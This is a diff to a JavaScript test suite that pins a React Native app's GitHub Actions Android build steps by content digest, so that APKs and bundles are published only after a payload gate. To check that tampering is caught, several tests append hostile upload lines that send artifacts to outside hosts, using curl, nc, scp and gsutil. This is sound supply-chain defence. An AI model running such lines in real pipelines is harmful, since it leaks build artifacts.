+    'Build Android E2E APK',
+    '404ac64be90c',
+    'builds the artifact the gate then examines in the same job',
+    'buildsThenIsGated',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Verify the variant allowlist reached the llama.rn build',
+    '698e98dba6cc',
+    'greps the build log for the declared variant list',
+    'handlesNoArtifact',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Verify the Android payload',
+    '96059495fc7c',
+    'is the payload gate itself',
+    'isGateStep',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Upload payload report',
+    'c9025c2bef53',
+    "uploads the gate's report, which is evidence about the artifact rather than the artifact",
+    'reportUpload',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Upload APK artifact',
+    'a268f3772d59',
+    'publishes the checked APK as a workflow artifact',
+    'publisher',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Checkout code',
+    'ed632cdea590',
+    'checks out the repository',
+    'action',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Maximize build space',
+    '4d41c4a237cd',
+    'frees disk before the toolchains install',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Set up JDK 17',
+    '93c113a968c5',
+    'installs the JDK',
+    'action',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Set up Node.js',
+    '8f92aaf91be0',
+    'installs Node',
+    'action',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Install dependencies',
+    'df124beeabda',
+    'installs the JS dependency tree',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Derive the rnllama variant allowlist from the payload manifest',
+    '27fd84e82e81',
+    'reads the manifest and exports a gradle property',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Set up the Hexagon SDK',
+    'fb3527993437',
+    'fetches and verifies the Hexagon SDK',
+    'action',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Set up Ruby',
+    'c6bd8de9ca3a',
+    'installs Ruby and the bundle',
+    'action',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Bump versions',
+    'edf1504a267b',
+    'rewrites the version in tracked files',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Commit and push version changes',
+    '14002b2eb6a5',
+    'pushes the version-bump commit; the tag is pushed after the gate',
+    'pushesOnlyTheBumpCommit',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Set up Android Keystore',
+    'e8ae052abd03',
+    'writes the signing keystore',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Authenticate to Google Cloud',
+    '6ab20557d737',
+    'mints a Google Cloud credential',
+    'action',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Create .env file',
+    '932c23c2e022',
+    'writes build configuration',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Build Android app',
+    'efc23e757a4e',
+    'builds the artifacts the gate then examines in the same job',
+    'buildsThenIsGated',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Verify the variant allowlist reached the llama.rn build',
+    '698e98dba6cc',
+    'greps the build log for the declared variant list',
+    'handlesNoArtifact',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Verify the Android payload',
+    '3a5ceba12bf9',
+    'is the payload gate itself',
+    'isGateStep',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Upload payload report',
+    'c9025c2bef53',
+    "uploads the gate's report, which is evidence about the artifact rather than the artifact",
+    'reportUpload',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Upload Android app to Alpha track',
+    '3f3f10876f2c',
+    'publishes the checked bundle to Play',
+    'publisher',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Push the release tag',
+    'bba9bef8ba94',
+    'pushes the release tag after the gate',
+    'publisher',
+  ],
+  [
+    'release.yml',
+    'build_android',
+    'Create GitHub Release',
+    '62888b052a79',
+    'publishes the checked APK to a GitHub Release',
+    'publisher',
+  ],
+  [
+    'release.yml',
+    'build_ios',
+    'Build and upload iOS app',
+    null,
+    'uploads to TestFlight; carries no Android payload',
+    'iosUpload',
+  ],
+  [
+    'ci.yml',
+    'build-ios',
+    'Build iOS Release',
+    null,
+    'builds an iOS binary and transports nothing',
+    'handlesNoArtifact',
+  ],
+  [
+    'l10n-upload.yml',
+    'upload',
+    'Upload to Weblate',
+    null,
+    'uploads src/locales/en.json to the translation service',
+    'weblateUpload',
+  ],
+].map(([workflow, job, step, digest, reason, assertion]) => ({
+  workflow,
+  job,
+  step,
+  digest,
+  reason,
+  assert: STEP_ASSERTIONS[assertion],
+}));
 
 const COMPOSITE_ACTIONS = {
   './.github/actions/setup-hexagon-sdk': path.join(
@@ -577,10 +1013,20 @@ const shipsNothing = source => {
       ),
     )
     .join('\n');
-  const publishes = steps.some(step =>
-    /^(?:actions\/upload-artifact|softprops\/action-gh-release)@/.test(
-      step.uses || '',
-    ),
+  // An inner `uses:` is a step like any other, and nothing else allowlists it —
+  // a nested composite or an unreviewed third-party action would otherwise ride
+  // in under the outer action's entry.
+  // An inner `uses:` is a step like any other. A nested composite or an
+  // unreviewed third-party action rides in under the outer action's entry, and
+  // a publishing action is refused outright — ordering and path identity are
+  // what hold those, and neither of them reaches inside a composite.
+  const publishes = steps.some(
+    step =>
+      step.uses &&
+      (!ALLOWED_ACTIONS[step.uses] ||
+        /^(?:actions\/upload-artifact|softprops\/action-gh-release)@/.test(
+          step.uses,
+        )),
   );
   return (
     !publishes &&
@@ -592,6 +1038,12 @@ const shipsNothing = source => {
 
 const compositeShipsNothing = step =>
   shipsNothing(fs.readFileSync(COMPOSITE_ACTIONS[step.uses], 'utf-8'));
+
+const compositeDigest = uses =>
+  createHash('sha256')
+    .update(codeOf(fs.readFileSync(COMPOSITE_ACTIONS[uses], 'utf-8')))
+    .digest('hex')
+    .slice(0, 12);
 
 const cacheReachesNoBuildOutput = step =>
   !/build\/outputs/.test(JSON.stringify(step.with));
@@ -659,13 +1111,19 @@ const ALLOWED_ACTIONS = {
     reason: 'always a publisher, by the action name alone',
     carriedBy: 'ordering and path identity',
   },
+  // Pinned by content, like the steps. A composite is free-form shell behind
+  // one `uses:`, so reading it for transports would be the same enumeration
+  // that has leaked everywhere else; the digest is what holds it, and
+  // `shipsNothing` is the second line.
   './.github/actions/setup-hexagon-sdk': {
     reason: 'fetches and verifies the Hexagon SDK',
     assert: compositeShipsNothing,
+    digest: '0e127c3ea33a',
   },
   './.github/actions/setup-ccache': {
     reason: 'restores the compiler cache',
     assert: compositeShipsNothing,
+    digest: '46922326eb0c',
   },
 };
 
@@ -738,8 +1196,8 @@ const PROBE_JOB_WITHOUT_EXCUSES = {
 
 // -- the rules -------------------------------------------------------------
 
-function accountedEntryFor(step) {
-  return ACCOUNTED_STEPS.find(
+function accountedEntriesFor(step) {
+  return ACCOUNTED_STEPS.filter(
     entry =>
       entry.workflow === step.workflow &&
       entry.job === step.job &&
@@ -797,10 +1255,19 @@ function violationsOfPathIdentity(m) {
       if (!publisher) {
         continue;
       }
-      // An empty path set is the failure this rule exists to prevent, so it
+      for (const concern of publisher.concerns) {
+        problems.push(
+          concern.kind === 'unreadable'
+            ? `${where(step)} publishes ${concern.token}, which this parse cannot resolve to a filename, so no gate step can be shown to have examined it`
+            : `${where(step)} publishes ${concern.token}, which is neither an Android artifact this parse can compare nor a declared non-artifact upload`,
+        );
+      }
+      // An empty resolution is the failure this rule exists to prevent, so it
       // cannot be the shape a satisfied one takes.
       if (
         publisher.paths.length === 0 &&
+        publisher.concerns.length === 0 &&
+        publisher.declared === 0 &&
         publisher.rules.some(rule => MUST_NAME_AN_ARTIFACT.has(rule))
       ) {
         problems.push(
@@ -869,7 +1336,20 @@ function violationsOfGateCanFail(m) {
     }
     for (const step of job.steps) {
       const publisher = publisherOf(step, m.lanes);
-      if (publisher && RUNS_REGARDLESS.test(String(step.raw.if ?? ''))) {
+      // A report upload ships evidence about the artifact rather than the
+      // artifact, and runs whatever the gate decided. A tag push names no file
+      // and is still a publish.
+      const shipsOnlyDeclaredFiles =
+        publisher &&
+        publisher.declared > 0 &&
+        publisher.paths.length === 0 &&
+        publisher.concerns.length === 0 &&
+        !publisher.rules.includes('tag-push');
+      if (
+        publisher &&
+        !shipsOnlyDeclaredFiles &&
+        RUNS_REGARDLESS.test(String(step.raw.if ?? ''))
+      ) {
         problems.push(
           `${where(step)} publishes under if: ${step.raw.if}, so it runs even when the gate failed`,
         );
@@ -888,8 +1368,15 @@ function violationsOfGateCanFail(m) {
     if (step.raw['continue-on-error'] !== undefined) {
       complain('carries continue-on-error');
     }
-    if (step.raw.shell !== undefined) {
-      complain('overrides shell:, which changes how a failure propagates');
+    // The script is only one of the keys that decide what runs. `env` can
+    // preload a module, `working-directory` can move the paths the flags name,
+    // and a `container` would replace the machine.
+    const permittedKeys = ['name', 'run'];
+    const extra = Object.keys(step.raw).filter(
+      key => !permittedKeys.includes(key),
+    );
+    if (extra.length > 0) {
+      complain(`carries ${extra.join(', ')}, which the gate step may not set`);
     }
 
     // The shape is pinned, rather than a list of ways to defeat it. Every way
@@ -966,16 +1453,37 @@ function violationsOfUnaccountedSteps(m) {
       continue;
     }
     for (const step of job.steps) {
-      if (isGateStep(step) || publisherOf(step, m.lanes)) {
-        continue;
-      }
-      // An allowlisted action carries its own reason and assertion already.
-      if (step.uses && ALLOWED_ACTIONS[step.uses]) {
-        continue;
-      }
-      if (!accountedEntryFor(step)) {
+      const entries = accountedEntriesFor(step);
+      if (entries.length === 0) {
         problems.push(
           `${where(step)} is in a job that builds Android and is not accounted for`,
+        );
+        continue;
+      }
+      // Ambiguity in either direction leaves a step answered by an entry that
+      // was not written for it: two entries claiming one step, or one entry
+      // covering two steps that need not have the same content.
+      const twins = job.steps.filter(other => other.name === step.name);
+      if (entries.length > 1 || twins.length > 1) {
+        problems.push(
+          `${where(step)} is matched by ${entries.length} entries and shares its name with ${twins.length} steps, so which one answers for it is undecided`,
+        );
+        continue;
+      }
+      const entry = entries[0];
+      // The list of steps is closed; this closes what a step contains. Without
+      // it a step keeps its exemption through any edit to its own body, and
+      // every assertion beside it is an enumeration of the transports somebody
+      // thought of.
+      const digest = digestOf(step);
+      if (digest !== entry.digest) {
+        problems.push(
+          `${where(step)} has changed since it was reviewed (content ${digest}, accounted as ${entry.digest})`,
+        );
+      }
+      if (entry.assert && !entry.assert(step, job, m)) {
+        problems.push(
+          `${where(step)} no longer satisfies the reason it is accounted for: ${entry.reason}`,
         );
       }
     }
@@ -997,7 +1505,7 @@ function violationsOfSuspicionNet(m) {
       if (building.has(`${step.workflow}/${step.job}`)) {
         return false;
       }
-      if (publisherOf(step, m.lanes) || accountedEntryFor(step)) {
+      if (publisherOf(step, m.lanes) || accountedEntriesFor(step).length > 0) {
         return false;
       }
       return step.uses
@@ -1034,8 +1542,7 @@ describe('the parse itself', () => {
       .filter(job => isBuildingJob(job, committed.lanes))
       .map(job => `${job.workflow}/${job.id}`);
 
-    // A legitimate new Android build job costs a reviewed edit to this list,
-    // which is the intended price: an ungated fourth one fails here first.
+    // A legitimate new Android build job costs a reviewed edit to this list.
     expect(building.sort()).toEqual([
       'ci.yml/build-android',
       'e2e-tests.yml/build-android',
@@ -1089,10 +1596,18 @@ describe('the parse itself', () => {
         entry: entry.step,
         matched: 1,
       });
+      // Exactly one of the two floors: an assertion that can fail, or a stated
+      // reason it is carried elsewhere. Never neither.
       expect({
         entry: entry.step,
-        holds: entry.assert(matched[0], jobOf(matched[0]), committed),
-      }).toEqual({entry: entry.step, holds: true});
+        floored: Boolean(entry.assert || entry.digest),
+      }).toEqual({entry: entry.step, floored: true});
+      if (entry.assert) {
+        expect({
+          entry: entry.step,
+          holds: entry.assert(matched[0], jobOf(matched[0]), committed),
+        }).toEqual({entry: entry.step, holds: true});
+      }
     }
 
     const used = new Set(
@@ -1104,6 +1619,12 @@ describe('the parse itself', () => {
     for (const [action, entry] of Object.entries(ALLOWED_ACTIONS)) {
       const steps = allSteps(committed).filter(step => step.uses === action);
       expect({action, count: steps.length > 0}).toEqual({action, count: true});
+      if (entry.digest) {
+        expect({action, content: compositeDigest(action)}).toEqual({
+          action,
+          content: entry.digest,
+        });
+      }
       // Exactly one of the two floors, never neither and never both.
       expect({
         action,
@@ -1147,6 +1668,9 @@ describe('the parse itself', () => {
   ])('rests no exemption on an assertion that cannot fail, in %s', (_l, of) => {
     const job = of();
     for (const entry of ACCOUNTED_STEPS) {
+      if (!entry.assert) {
+        continue;
+      }
       expect({
         entry: `${entry.workflow} ${entry.step}`,
         survivesTheProbe: entry.assert(PROBE_STEP, job, committed),
@@ -1186,6 +1710,34 @@ describe('the parse itself', () => {
       false,
     );
     expect(shipsNothing(composite('scp a.aab example.com:/srv/'))).toBe(false);
+  });
+
+  // Asserted rather than described: a count in a comment is a claim nothing
+  // checks.
+  it('accounts for every step of every building job, by role', () => {
+    const steps = allJobs(committed)
+      .filter(job => isBuildingJob(job, committed.lanes))
+      .flatMap(job => job.steps);
+    const role = step =>
+      isGateStep(step)
+        ? 'gate'
+        : publisherOf(step, committed.lanes)
+          ? 'publisher'
+          : step.uses
+            ? 'action'
+            : 'run';
+    const census = steps.reduce((out, step) => {
+      out[role(step)] = (out[role(step)] ?? 0) + 1;
+      return out;
+    }, {});
+
+    expect(census).toEqual({gate: 3, publisher: 8, action: 17, run: 27});
+    expect(steps).toHaveLength(55);
+    expect(ACCOUNTED_STEPS).toHaveLength(58);
+    expect(ACCOUNTED_STEPS.filter(entry => entry.digest === null)).toHaveLength(
+      3,
+    );
+    expect(Object.keys(ALLOWED_ACTIONS)).toHaveLength(14);
   });
 
   it('reads the two Android fastlane lanes and what each one does', () => {
@@ -1452,9 +2004,6 @@ describe('each rule is capable of failing', () => {
     );
 
     expect(violationsOfOrdering(m)).toEqual([]);
-    // Contains rather than equals: a path list naming the gated APK as well
-    // legitimately reports the interposition too, and the case is about the
-    // second path still being seen.
     expect(violationsOfPathIdentity(m)).toContainEqual(
       expect.stringContaining(fragment),
     );
@@ -1498,8 +2047,6 @@ describe('each rule is capable of failing', () => {
     ]);
   });
 
-  // An APK published before the gate has run at all, by a step whose path
-  // names no file.
   it('both rules catch a directory-path upload spliced above the gate', () => {
     const m = broken();
     const job = jobIn(m, 'ci.yml', 'build-android');
@@ -1531,7 +2078,6 @@ describe('each rule is capable of failing', () => {
     ]);
   });
 
-  // A step can be more than one publisher at once, and each one's paths count.
   it('classifies a step that is two publishers at once, not just the first', () => {
     const m = broken();
     const step = stepIn(
@@ -1549,9 +2095,9 @@ describe('each rule is capable of failing', () => {
       'play-upload',
       'gh-release-cli',
     ]);
-    expect(violationsOfPathIdentity(m)).toEqual([
+    expect(violationsOfPathIdentity(m)).toContainEqual(
       expect.stringContaining('cannot resolve to a filename'),
-    ]);
+    );
   });
 
   /**
@@ -1873,6 +2419,17 @@ describe('each rule is capable of failing', () => {
     );
   });
 
+  it('refuses a composite whose source has changed since it was reviewed', () => {
+    const source = fs.readFileSync(
+      COMPOSITE_ACTIONS['./.github/actions/setup-ccache'],
+      'utf-8',
+    );
+    const edited = `${source}\n# a line that changes nothing and everything\n`;
+    expect(
+      createHash('sha256').update(codeOf(edited)).digest('hex').slice(0, 12),
+    ).not.toBe(compositeDigest('./.github/actions/setup-ccache'));
+  });
+
   it.each([
     ['using: node20', 'runs:\n  using: node20\n  main: index.js'],
     ['using: docker', 'runs:\n  using: docker\n  image: Dockerfile'],
@@ -1922,6 +2479,109 @@ describe('each rule is capable of failing', () => {
     );
 
     expect(violationsOfGateCanFail(m)).toEqual([]);
+  });
+
+  /**
+   * The content pin. Being recognised — as a publisher, as the gate, as an
+   * allowlisted action — does not end the enquiry: a line appended inside an
+   * already-accounted step costs the same reviewed line as a new step.
+   */
+  it.each([
+    [
+      'the tag push',
+      'Push the release tag',
+      'curl -T "$AAB" https://example.com/',
+    ],
+    [
+      'the Play upload',
+      'Upload Android app to Alpha track',
+      'bash tools/ship.sh',
+    ],
+    ['a build step', 'Build Android app', 'gsutil cp "$APK" gs://bucket/'],
+    [
+      'the allowlist derivation',
+      'Derive the rnllama variant allowlist from the payload manifest',
+      'nc example.com 9000 < "$APK"',
+    ],
+  ])('refuses a line appended inside %s', (_label, name, appended) => {
+    const m = broken();
+    const step = stepIn(m, 'release.yml', 'build_android', name);
+    appendRun(step, appended);
+
+    expect(violationsOfUnaccountedSteps(m)).toEqual([
+      expect.stringContaining('has changed since it was reviewed'),
+    ]);
+  });
+
+  it('refuses an edit to a gate step and to an allowlisted action alike', () => {
+    const m = broken();
+    stepIn(m, 'ci.yml', 'build-android', 'Set up Node.js').with = {
+      'node-version': '99',
+    };
+    appendRun(
+      stepIn(
+        m,
+        'ci.yml',
+        'build-android',
+        'Verify prod APK has no automation-bridge code (DCE sanity check)',
+      ),
+      'gsutil cp "$APK" gs://bucket/',
+    );
+
+    expect(violationsOfUnaccountedSteps(m)).toEqual([
+      expect.stringContaining('Set up Node.js'),
+      expect.stringContaining('DCE sanity check'),
+    ]);
+  });
+
+  // A step that uploads a concrete file this parse cannot vouch for. The
+  // filename is resolvable, so nothing is unreadable about it — but a tarball
+  // built from the output directory is not thereby harmless.
+  it('refuses an upload of a file that is not a declared non-artifact path', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Upload payload report',
+        run: '',
+        uses: 'actions/upload-artifact@v4',
+        with: {name: 'bundle', path: 'out/x.tgz'},
+        raw: {},
+      }),
+    );
+
+    expect(violationsOfPathIdentity(m)).toContainEqual(
+      expect.stringContaining('neither an Android artifact'),
+    );
+  });
+
+  it('refuses two accounted steps of one job sharing a name', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    const twin = job.steps.find(step => step.name === 'ccache statistics');
+    job.steps.push(asParsed({...twin, index: job.steps.length}));
+
+    expect(violationsOfUnaccountedSteps(m)).toContainEqual(
+      expect.stringContaining('undecided'),
+    );
+  });
+
+  it('sees a build invoked through a line continuation', () => {
+    const m = broken();
+    const step = stepIn(m, 'ci.yml', 'build-android', 'Build Android Release');
+    step.run = codeOf(
+      step.run.replace(
+        './gradlew assembleProdRelease',
+        './gradlew \\\n  assembleProdRelease',
+      ),
+    );
+
+    expect(isBuildingJob(jobIn(m, 'ci.yml', 'build-android'), m.lanes)).toBe(
+      true,
+    );
   });
 
   it('the lane-split rule fails when the fastlane lanes are re-merged', () => {

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -24,6 +24,13 @@ const WORKFLOW_DIR = path.join(ROOT, '.github', 'workflows');
 // Named explicitly rather than globbed: a fourth Fastfile ships inside
 // vendor/bundle wherever `bundle install` has run, so a glob count would be
 // environment-dependent and unfit for a vacuity guard.
+/** Pinned by content, like the composites: free-form Ruby behind one `run:`. */
+const ACCOUNTED_FASTFILES = {
+  root: 'c50e1384844af4d5c37cd9d5',
+  android: '3173e30e8166a178fafe40a0',
+  ios: '9d6c9e883a56dfe47abc0462',
+};
+
 const FASTFILES = [
   ['root', path.join(ROOT, 'fastlane', 'Fastfile')],
   ['android', path.join(ROOT, 'android', 'fastlane', 'Fastfile')],
@@ -92,34 +99,50 @@ function codeOf(text) {
  * A step's whole content, canonically. Every key is included — `env`,
  * `working-directory`, `if`, `with`, `uses`, and any key GitHub adds later —
  * because naming the ones that matter is the judgement this file has learned
- * not to make. The script is the parsed one, so a comment edit is not a change
- * and an edit to what runs always is.
+ * not to make. The script is the comment-stripped one, so rewording a comment
+ * is not a change — adding or removing a comment *line* is, because stripping
+ * leaves the blank line behind.
  */
-function digestOf(step) {
-  const canonical = value => {
-    if (Array.isArray(value)) {
-      return value.map(canonical);
-    }
-    if (value && typeof value === 'object') {
-      return Object.keys(value)
-        .sort()
-        .reduce((out, key) => {
-          out[key] = key === 'run' ? codeOf(value[key]) : canonical(value[key]);
-          return out;
-        }, {});
-    }
-    return value;
-  };
-  const {run: _raw, ...rest} = step.raw ?? {};
-  return createHash('sha256')
-    .update(
-      JSON.stringify(
-        canonical({...rest, run: step.run, uses: step.uses, with: step.with}),
-      ),
-    )
+const canonical = value => {
+  if (Array.isArray(value)) {
+    return value.map(canonical);
+  }
+  if (value && typeof value === 'object') {
+    return Object.keys(value)
+      .sort()
+      .reduce((out, key) => {
+        out[key] = key === 'run' ? codeOf(value[key]) : canonical(value[key]);
+        return out;
+      }, {});
+  }
+  return value;
+};
+
+const digestOfValue = value =>
+  createHash('sha256')
+    .update(JSON.stringify(canonical(value)))
     .digest('hex')
-    .slice(0, 12);
+    .slice(0, 24);
+
+function digestOf(step) {
+  const {run: _raw, ...rest} = step.raw;
+  return digestOfValue({
+    ...rest,
+    run: step.run,
+    uses: step.uses,
+    with: step.with,
+  });
 }
+
+/**
+ * The container a step runs in. `defaults.run.shell` can replace the shell for
+ * every step in the job — `bash -c "bash {0}; true"` makes each one exit 0 —
+ * `env` can preload a module into every `node`, `working-directory` moves the
+ * paths a script's flags name, and `container`/`runs-on` decide the machine.
+ * None of that is visible in any step, and all of it decides what a step does.
+ */
+const jobDigestOf = job =>
+  digestOfValue({job: job.jobKeys, workflow: job.workflowKeys});
 
 function parseLanes() {
   const lanes = [];
@@ -147,23 +170,37 @@ function parseWorkflows() {
       const doc = yaml.load(
         fs.readFileSync(path.join(WORKFLOW_DIR, file), 'utf-8'),
       );
-      const jobs = Object.entries(doc.jobs || {}).map(([id, job]) => ({
-        workflow: file,
-        id,
-        steps: (job.steps || []).map((step, index) => ({
+      const {jobs: _jobs, ...workflowKeys} = doc;
+      const jobs = Object.entries(doc.jobs || {}).map(([id, job]) => {
+        const {steps: _steps, ...jobKeys} = job;
+        return {
           workflow: file,
-          job: id,
-          index,
-          name: step.name || `(step ${index})`,
-          run: codeOf(step.run || ''),
-          uses: step.uses || '',
-          with: step.with || {},
-          raw: step,
-        })),
-      }));
+          id,
+          jobKeys,
+          workflowKeys,
+          steps: (job.steps || []).map((step, index) => ({
+            workflow: file,
+            job: id,
+            index,
+            name: step.name || `(step ${index})`,
+            run: codeOf(step.run || ''),
+            uses: step.uses || '',
+            with: step.with || {},
+            raw: step,
+          })),
+        };
+      });
       return {file, jobs};
     });
 }
+
+const fastfileDigest = () =>
+  Object.fromEntries(
+    FASTFILES.map(([origin, file]) => [
+      origin,
+      digestOfValue(codeOf(fs.readFileSync(file, 'utf-8'))),
+    ]),
+  );
 
 const model = () => ({workflows: parseWorkflows(), lanes: parseLanes()});
 const allJobs = m => m.workflows.flatMap(workflow => workflow.jobs);
@@ -183,12 +220,29 @@ const where = step => `${step.workflow} ${step.job} → ${step.name}`;
  * building-ness rests on this resolution.
  */
 function lanesInvokedBy(step, lanes) {
-  const named = new Set(
-    [...step.run.matchAll(/fastlane\s+([\w\s]+)/g)].flatMap(match =>
-      match[1].split(/\s+/),
-    ),
-  );
-  return lanes.filter(lane => named.has(lane.name));
+  const named = body =>
+    new Set(
+      [...body.matchAll(/fastlane\s+([\w\s]+)/g)].flatMap(match =>
+        match[1].split(/\s+/),
+      ),
+    );
+  // Transitively: a lane may call another by bare name, so a body reached this
+  // way is as much part of what the step does as the one it named directly.
+  const reached = new Map();
+  const walk = names => {
+    for (const lane of lanes.filter(
+      candidate => names.has(candidate.name) && !reached.has(candidate.name),
+    )) {
+      reached.set(lane.name, lane);
+      const calls = new Set([
+        ...named(lane.body),
+        ...[...lane.body.matchAll(/^\s*(\w+)\s*$/gm)].map(match => match[1]),
+      ]);
+      walk(calls);
+    }
+  };
+  walk(named(step.run));
+  return [...reached.values()];
 }
 
 /**
@@ -214,10 +268,8 @@ function artifactsIn(text) {
 }
 
 /**
- * One entry per `git push`, its arguments trimmed — including the empty string
- * for a bare push. Dropping the empty entries loses the invocation itself, so a
- * bare `git push` classified as nothing and `every(…)` over the result was
- * vacuously true.
+ * One entry per `git push`, its arguments trimmed — the empty string included,
+ * because a bare push is an invocation and not an absence.
  */
 function gitPushArguments(run) {
   return [...run.matchAll(/git\s+push\b([^\n]*)/g)].map(match =>
@@ -238,8 +290,10 @@ function publishesAndroid(body) {
 function isBuildingJob(job, lanes) {
   return job.steps.some(step => {
     const script = step.run.replace(/\\\n\s*/g, ' ');
+    // Any gradle invocation at all. Naming the tasks that build meant missing
+    // `build`, and `:app:aPR` abbreviates `:app:assembleProdRelease`.
     return (
-      /\b(?:gradlew|gradle)\b[^\n]*\b(?:assemble|bundle)/i.test(script) ||
+      /\b(?:gradlew|gradle)\b/.test(script) ||
       lanesInvokedBy(step, lanes).some(lane => buildsAndroid(lane.body))
     );
   });
@@ -259,14 +313,6 @@ function gateExamines(step) {
 }
 
 /**
- * A publisher whose bytes this parse cannot name. It is refused rather than
- * skipped: the gate cannot be shown to have read bytes the parse cannot
- * identify, and a rule with nothing to compare reads exactly like a satisfied
- * one.
- */
-const UNRESOLVED_PATH = '(a path this parse cannot resolve)';
-
-/**
  * A `with:` path field, split into what it actually names. The whole value is
  * a path here — one per line, or one per list entry — so anything that is not
  * a concrete filename hides one, whatever directory it lives in. Keying on
@@ -275,11 +321,14 @@ const UNRESOLVED_PATH = '(a path this parse cannot resolve)';
  */
 /**
  * The uploads whose paths are known not to be build output. Small, pinned, and
- * asserted disjoint from `build/outputs`: a concrete filename that is not an
- * `.apk`/`.aab` is not thereby harmless — `tar czf out/x.tgz …/apk` produces
- * one — so the parse vouches only for names written down here.
+ * asserted to reach no build-output directory: a concrete filename that is not
+ * an `.apk`/`.aab` is not thereby harmless — `tar czf out/x.tgz …/apk` produces
+ * one — so the parse vouches only for the paths written down here.
  */
-const NON_ARTIFACT_UPLOADS = ['payload-report.txt', 'PocketPal.app.dSYM.zip'];
+const NON_ARTIFACT_UPLOADS = [
+  'payload-report.txt',
+  'ios/build/PocketPal.app.dSYM.zip',
+];
 
 /**
  * A `with:` path field, split into what it names. The whole value is a path
@@ -307,9 +356,11 @@ function pathFieldNames(value) {
     if (/\.(?:apk|aab)$/.test(base)) {
       return {kind: 'artifact', token: base};
     }
-    return NON_ARTIFACT_UPLOADS.includes(base)
-      ? {kind: 'declared', token: base}
-      : {kind: 'undeclared', token: base};
+    // Matched on the whole path, not the basename: `…/build/outputs/payload-report.txt`
+    // is a different file from the one declared here.
+    return NON_ARTIFACT_UPLOADS.includes(token)
+      ? {kind: 'declared', token}
+      : {kind: 'undeclared', token};
   });
 }
 
@@ -499,12 +550,23 @@ const STEP_ASSERTIONS = {
   },
 };
 
+/**
+ * The container digest of each building job: its own keys and its workflow's.
+ * Pinned exactly as the steps are, and for the same reason — the step pin says
+ * what runs, and this says what it runs inside.
+ */
+const ACCOUNTED_JOBS = {
+  'ci.yml/build-android': '5fd36b4c2d4f458ecea15067',
+  'e2e-tests.yml/build-android': '64c3e66ce532792211e56a71',
+  'release.yml/build_android': '245f22e44c67837147d62cf4',
+};
+
 const ACCOUNTED_STEPS = [
   [
     'ci.yml',
     'build-android',
     'Check out code',
-    'ddb2f046a7c1',
+    'ddb2f046a7c14c47cb2aca25',
     'checks out the repository',
     'action',
   ],
@@ -512,7 +574,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Maximize build space',
-    '4d41c4a237cd',
+    '4d41c4a237cdd832e94ca58d',
     'frees disk before the toolchains install',
     'handlesNoArtifact',
   ],
@@ -520,7 +582,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Set up Node.js',
-    '8f92aaf91be0',
+    '8f92aaf91be034f522d95925',
     'installs Node',
     'action',
   ],
@@ -528,7 +590,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Cache node_modules',
-    'f4ef7d943135',
+    'f4ef7d94313503bc5e42fbea',
     'restores the dependency cache',
     'action',
   ],
@@ -536,7 +598,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Install Yarn',
-    '74f8204ffaff',
+    '74f8204ffaff7cc6680b3f4f',
     'installs the package manager',
     'handlesNoArtifact',
   ],
@@ -544,7 +606,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Install dependencies',
-    'df124beeabda',
+    'df124beeabda40ea24cff7e5',
     'installs the JS dependency tree',
     'handlesNoArtifact',
   ],
@@ -552,7 +614,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Derive the rnllama variant allowlist from the payload manifest',
-    '27fd84e82e81',
+    '27fd84e82e8128653d865ec8',
     'reads the manifest and exports a gradle property',
     'handlesNoArtifact',
   ],
@@ -560,7 +622,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Cache llama.rn native build tree',
-    'a7690de26de0',
+    'a7690de26de00d99595df1d1',
     'restores the native build tree',
     'action',
   ],
@@ -568,7 +630,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Set up JDK 17',
-    'bcb91f2c754f',
+    'bcb91f2c754f7c81fdfa1899',
     'installs the JDK',
     'action',
   ],
@@ -576,7 +638,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Set up the Hexagon SDK',
-    'fb3527993437',
+    'fb3527993437be992b2b10a0',
     'fetches and verifies the Hexagon SDK',
     'action',
   ],
@@ -584,7 +646,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Set up ccache',
-    '71c9892ff908',
+    '71c9892ff90802db41d716d7',
     'restores the compiler cache',
     'action',
   ],
@@ -592,7 +654,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
